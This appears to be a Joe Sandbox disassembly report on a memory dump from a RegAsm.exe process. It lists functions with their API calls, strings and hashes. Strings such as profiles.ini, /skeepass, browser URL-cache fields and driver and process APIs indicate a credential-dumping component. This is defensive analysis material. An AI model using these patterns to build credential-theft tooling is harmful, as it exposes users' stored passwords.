                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                • API String ID: 2454223109-1580313836
                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                • API String ID: 4054529287-3175352466
                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                • API String ID: 667068680-2887671607
                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintf$memset$wcscpy
                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                • API String ID: 2000436516-3842416460
                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                • String ID:
                                                                • API String ID: 1043902810-0
                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                • free.MSVCRT ref: 0040E49A
                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • memset.MSVCRT ref: 0040E380
                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                • API String ID: 3849927982-2252543386
                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                • _snwprintf.MSVCRT ref: 0044488A
                                                                • wcscpy.MSVCRT ref: 004448B4
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                • API String ID: 2899246560-1542517562
                                                                • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • memset.MSVCRT ref: 004085CF
                                                                • memset.MSVCRT ref: 004085F1
                                                                • memset.MSVCRT ref: 00408606
                                                                • strcmp.MSVCRT ref: 00408645
                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                • memset.MSVCRT ref: 0040870E
                                                                • strcmp.MSVCRT ref: 0040876B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                • String ID: ---
                                                                • API String ID: 3437578500-2854292027
                                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0041087D
                                                                • memset.MSVCRT ref: 00410892
                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                • String ID:
                                                                • API String ID: 1010922700-0
                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • malloc.MSVCRT ref: 004186B7
                                                                • free.MSVCRT ref: 004186C7
                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                • free.MSVCRT ref: 004186E0
                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                • malloc.MSVCRT ref: 004186FE
                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                • free.MSVCRT ref: 00418716
                                                                • free.MSVCRT ref: 0041872A
                                                                • free.MSVCRT ref: 00418749
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$FullNamePath$malloc$Version
                                                                • String ID: |A
                                                                • API String ID: 3356672799-1717621600
                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                • API String ID: 2081463915-1959339147
                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                • API String ID: 2012295524-70141382
                                                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                • API String ID: 667068680-3953557276
                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                • String ID:
                                                                • API String ID: 1700100422-0
                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                • String ID:
                                                                • API String ID: 552707033-0
                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf
                                                                • String ID: %%0.%df
                                                                • API String ID: 3473751417-763548558
                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
